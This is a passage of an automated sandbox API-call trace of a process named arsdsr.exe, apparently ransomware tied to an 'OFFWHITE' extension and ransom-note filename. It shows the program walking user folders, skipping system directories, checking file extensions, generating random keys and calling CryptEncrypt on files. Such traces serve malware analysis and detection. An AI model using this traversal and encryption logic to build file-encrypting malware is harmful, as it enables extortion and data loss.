lpString1="C:/Users\\Default\\Recent", lpString2="\\" | out: lpString1="C:/Users\\Default\\Recent\\") returned="C:/Users\\Default\\Recent\\" [0153.333] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Recent\\" | out: lpString1="C:/Users\\Default\\Recent\\") returned="C:/Users\\Default\\Recent\\" [0153.333] lstrcatW (in: lpString1="C:/Users\\Default\\Recent\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Recent\\*.*") returned="C:/Users\\Default\\Recent\\*.*" [0153.333] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Recent\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0153.333] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0153.333] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0153.333] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0153.333] lstrcmpiW (lpString1="Saved Games", lpString2="...") returned 1 [0153.333] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0153.333] lstrcmpiW (lpString1="Saved Games", lpString2="$recycle.bin") returned 1 [0153.333] lstrcmpiW (lpString1="Saved Games", lpString2="rsa") returned 1 [0153.334] lstrcmpiW (lpString1="Saved Games", lpString2="ntuser.dat") returned 1 [0153.334] lstrcmpiW (lpString1="Saved Games", lpString2="programdata") returned 1 [0153.334] lstrcmpiW (lpString1="Saved Games", lpString2="appdata") returned 1 [0153.334] lstrcmpiW (lpString1="Saved Games", lpString2="program files") returned 1 [0153.334] lstrcmpiW (lpString1="Saved Games", lpString2="program files (x86)") returned 1 [0153.334] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.334] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Saved Games" | out: lpString1="C:/Users\\Default\\Saved Games") returned="C:/Users\\Default\\Saved Games" [0153.334] lstrcatW (in: lpString1="C:/Users\\Default\\Saved Games", lpString2="\\" | out: lpString1="C:/Users\\Default\\Saved Games\\") returned="C:/Users\\Default\\Saved Games\\" [0153.334] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Saved Games\\" | out: lpString1="C:/Users\\Default\\Saved Games\\") returned="C:/Users\\Default\\Saved Games\\" [0153.334] lstrcatW (in: lpString1="C:/Users\\Default\\Saved Games\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Saved Games\\*.*") returned="C:/Users\\Default\\Saved Games\\*.*" [0153.334] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Saved Games\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.334] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.334] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="..", cAlternateFileName="")) returned 1 [0153.334] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.334] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.334] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.334] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.334] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.334] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.334] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.335] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.335] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.335] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.335] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.335] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.335] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.335] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.335] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Saved Games\\" | out: lpString1="C:/Users\\Default\\Saved Games\\") returned="C:/Users\\Default\\Saved Games\\" [0153.335] lstrcatW (in: lpString1="C:/Users\\Default\\Saved Games\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Saved Games\\desktop.ini") returned="C:/Users\\Default\\Saved Games\\desktop.ini" [0153.335] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.335] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.335] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.335] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.335] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.335] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.335] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.335] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.335] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.335] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.335] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0153.335] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.335] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Searches", cAlternateFileName="")) returned 1 [0153.335] lstrcmpiW (lpString1="Searches", lpString2=".") returned 1 [0153.335] lstrcmpiW (lpString1="Searches", lpString2="..") returned 1 [0153.335] lstrcmpiW (lpString1="Searches", lpString2="...") returned 1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="windows") returned -1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="$recycle.bin") returned 1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="rsa") returned 1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="ntuser.dat") returned 1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="programdata") returned 1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="appdata") returned 1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="program files") returned 1 [0153.336] lstrcmpiW (lpString1="Searches", lpString2="program files (x86)") returned 1 [0153.336] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.336] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Searches" | out: lpString1="C:/Users\\Default\\Searches") returned="C:/Users\\Default\\Searches" [0153.336] lstrcatW (in: lpString1="C:/Users\\Default\\Searches", lpString2="\\" | out: lpString1="C:/Users\\Default\\Searches\\") returned="C:/Users\\Default\\Searches\\" [0153.336] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Searches\\" | out: lpString1="C:/Users\\Default\\Searches\\") returned="C:/Users\\Default\\Searches\\" [0153.336] lstrcatW (in: lpString1="C:/Users\\Default\\Searches\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Searches\\*.*") returned="C:/Users\\Default\\Searches\\*.*" [0153.336] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Searches\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.373] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.373] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="..", cAlternateFileName="")) returned 1 [0153.373] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.373] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.373] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.373] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.373] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Searches\\" | out: lpString1="C:/Users\\Default\\Searches\\") returned="C:/Users\\Default\\Searches\\" [0153.373] lstrcatW (in: lpString1="C:/Users\\Default\\Searches\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Searches\\desktop.ini") returned="C:/Users\\Default\\Searches\\desktop.ini" [0153.373] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.373] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.374] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.374] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.374] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.374] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.374] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.374] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.374] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.374] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.374] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="...") returned 1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="windows") returned -1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="$recycle.bin") returned 1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="rsa") returned -1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="programdata") returned -1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="appdata") returned 1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="program files") returned -1 [0153.374] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="program files (x86)") returned -1 [0153.374] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Searches\\" | out: lpString1="C:/Users\\Default\\Searches\\") returned="C:/Users\\Default\\Searches\\" [0153.374] lstrcatW (in: lpString1="C:/Users\\Default\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:/Users\\Default\\Searches\\Everywhere.search-ms") returned="C:/Users\\Default\\Searches\\Everywhere.search-ms" [0153.374] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.374] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.374] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0153.374] lstrcmpiW (lpString1=".search-ms", lpString2=".exe") returned 1 [0153.374] lstrcmpiW (lpString1=".search-ms", lpString2=".log") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".cab") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".cmd") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".com") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".cpl") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".ini") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".dll") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".url") returned -1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".ttf") returned -1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".mp3") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".pif") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".mp4") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".OFFWHITE") returned 1 [0153.375] lstrcmpiW (lpString1=".search-ms", lpString2=".msi") returned 1 [0153.375] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.375] GetProcessHeap () returned 0x500000 [0153.375] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e58 [0153.375] CreateFileW (lpFileName="C:/Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0153.514] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=-4251589180) returned 0 [0153.514] GetProcessHeap () returned 0x500000 [0153.514] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0153.515] GetProcessHeap () returned 0x500000 [0153.515] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0153.515] GetProcessHeap () returned 0x500000 [0153.515] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0153.515] GetProcessHeap () returned 0x500000 [0153.515] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0153.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.515] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0153.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.515] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0153.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.515] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0153.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.515] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0153.516] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295e5c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0153.516] SetLastError (dwErrCode=0x0) [0153.516] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565e90, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0) returned 0 [0153.516] GetLastError () returned 0x6 [0153.516] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="...") returned 1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="windows") returned -1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="$recycle.bin") returned 1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="rsa") returned -1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="programdata") returned -1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="appdata") returned 1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="program files") returned -1 [0153.516] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="program files (x86)") returned -1 [0153.516] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Searches\\" | out: lpString1="C:/Users\\Default\\Searches\\") returned="C:/Users\\Default\\Searches\\" [0153.517] lstrcatW (in: lpString1="C:/Users\\Default\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:/Users\\Default\\Searches\\Indexed Locations.search-ms") returned="C:/Users\\Default\\Searches\\Indexed Locations.search-ms" [0153.517] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.517] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.517] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".exe") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".log") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".cab") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".cmd") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".com") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".cpl") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".ini") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".dll") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".url") returned -1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".ttf") returned -1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".mp3") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".pif") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".mp4") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".OFFWHITE") returned 1 [0153.517] lstrcmpiW (lpString1=".search-ms", lpString2=".msi") returned 1 [0153.517] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.517] GetProcessHeap () returned 0x500000 [0153.517] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e68 [0153.517] CreateFileW (lpFileName="C:/Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0153.518] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=-4251589180) returned 0 [0153.518] GetProcessHeap () returned 0x500000 [0153.518] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b98 [0153.518] GetProcessHeap () returned 0x500000 [0153.518] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bb0 [0153.518] GetProcessHeap () returned 0x500000 [0153.518] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5660a0 [0153.518] GetProcessHeap () returned 0x500000 [0153.518] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5661a8 [0153.518] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.518] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.518] SystemFunction036 (in: RandomBuffer=0x543b98, RandomBufferLength=0x10 | out: RandomBuffer=0x543b98) returned 1 [0153.518] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.518] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.518] SystemFunction036 (in: RandomBuffer=0x543bb0, RandomBufferLength=0x10 | out: RandomBuffer=0x543bb0) returned 1 [0153.518] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.518] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.518] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5660a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5660a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0153.519] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.519] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.519] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5661a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5661a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0153.519] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295e5c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0153.519] SetLastError (dwErrCode=0x0) [0153.519] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5660a0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0) returned 0 [0153.519] GetLastError () returned 0x6 [0153.519] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, 